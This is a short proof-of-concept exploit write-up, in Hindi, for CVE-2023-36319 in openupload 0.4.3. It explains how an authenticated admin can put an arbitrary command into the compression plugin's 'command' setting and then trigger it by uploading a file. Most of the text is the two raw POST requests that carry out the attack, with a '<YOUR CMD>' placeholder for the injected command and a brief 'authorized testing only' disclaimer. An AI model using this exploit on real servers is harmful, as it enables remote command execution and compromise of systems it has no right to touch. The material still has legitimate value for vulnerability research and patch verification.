
exp4CVE-2023-36319
कंप्रेशन प्लग-इन कमांड को संशोधित करके, हमलावर अपलोड प्रक्रिया के दौरान सर्वर पर मनमाने कमांड निष्पादित कर सकता है।
केवल अधिकृत सुरक्षा परीक्षण के लिए उपयोग करें, कृपया इसे अवैध उद्देश्यों के लिए उपयोग न करें। उल्लंघनों का लेखक से कोई संबंध नहीं है।
openupload स्थिर संस्करण 0.4.3
बैकएंड में लॉग इन करें और फ़ंक्शन पर क्लिक करें: प्रशासन ->प्लगइन्स ->संपीड़ित करें
नया "command" निर्देश जोड़ें और सहेजें:
POST /index.php HTTP/1.1
Host: www.test.com
Content-Length: 183
Cache-Control: max-age=0
Sec-Ch-Ua: "Not.A/Brand";v="8", "Chromium";v="114", "Google Chrome";v="114"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
action=adminpluginsoptions&step=4&id=compress&gid=admins&command=<YOUR CMD>&extension=&compression=
"फ़ाइल अपलोड" फ़ंक्शन में प्रवेश करें, एक यादृच्छिक फ़ाइल अपलोड करें, और पैरामीटर में "compress=0" सुनिश्चित करें।
POST /index.php HTTP/1.1
Host: www.test.com
Content-Length: 53
Cache-Control: max-age=0
Sec-Ch-Ua: "Not.A/Brand";v="8", "Chromium";v="114", "Google Chrome";v="114"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
action=u&step=3&description=123&emailme=no&compress=0
हमारे द्वारा लिखे गए कमांड सामान्य रूप से निष्पादित होंगे।